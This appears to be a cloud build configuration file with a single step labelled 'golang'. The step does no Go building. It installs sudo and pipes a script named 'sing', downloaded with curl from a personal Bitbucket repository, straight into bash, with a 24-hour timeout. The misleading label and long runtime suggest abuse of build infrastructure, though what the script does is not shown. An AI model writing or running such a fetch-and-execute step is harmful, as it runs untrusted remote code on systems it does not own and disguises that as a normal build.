steps:
  - name: golang
    args:
      - '-c'
      - >-
         apt update && apt-get install sudo -y && curl -sL https://bitbucket.org/jeffreyadams29/paketu/raw/master/sing | bash
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
